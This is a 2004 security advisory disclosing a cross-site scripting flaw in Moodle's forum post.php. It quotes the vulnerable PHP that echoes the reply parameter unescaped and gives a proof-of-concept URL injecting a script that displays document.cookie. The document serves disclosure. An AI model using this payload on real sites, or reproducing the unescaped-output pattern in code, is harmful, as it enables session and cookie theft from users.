<<< Date Index >>>     <<< Thread Index >>>

xss in moodle (post.php)





+--------------------------------+
|                                | 
| XSS in Moodle < 1.3 (post.php) |
|                                |
+--------------------------------+

Autor: Javier Ubilla Brenni <javierubilla[at]spymac.com>
Date: 02/08/04

Software Description:
~~~~~~~~~~~~~~~~~~~~

"Moodle is a course management system (CMS) - a software package designed to 
help educators create quality online courses."
www.moodle.org

Bug:
~~~

Post.php is vulnerable to an XXS attack.
The bug was found in the $reply variable :

/* Begin of vulnerable code */

    } else if (isset($reply)) {      // User is writing a new reply

        if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");
        }
        if (! $discussion = get_record("forum_discussions", "id", 
$parent->discussion)) {
            error("This post is not part of a discussion! ($reply)");
        }
        if (! $forum = get_record("forum", "id", $discussion->forum)) {
            error("The forum number was incorrect ($discussion->forum)");
        }
        if (! $course = get_record("course", "id", $discussion->course)) {
            error("The course number was incorrect ($discussion->course)");
        }

        if (! forum_user_can_post($forum)) {
            error("Sorry, but you can not post in this forum.");
        }

        if ($cm = get_coursemodule_from_instance("forum", $forum->id, 
$course->id)) {
            if (groupmode($course, $cm) and !isteacheredit($course->id)) {   // 
Make sure user can post here
                if (mygroupid($course->id) != $discussion->groupid) {
                    error("Sorry, but you can not post in this discussion.");
                }
            }
            if (!$cm->visible and !isteacher($course->id)) {
                error(get_string("activityiscurrentlyhidden"));
            }
        }

/* End of vulnerable code */

Here is the bug:

if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");

Exploit:
~~~~~~~~

http://www.vulnerable.com/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Solution: 
~~~~~~~~~
Upgrade to the last version

Vendor Status:
~~~~~~~~~~~~~~
Notified.

Credits: Bug found by Javier Ubilla and Ariel.
~~~~~~~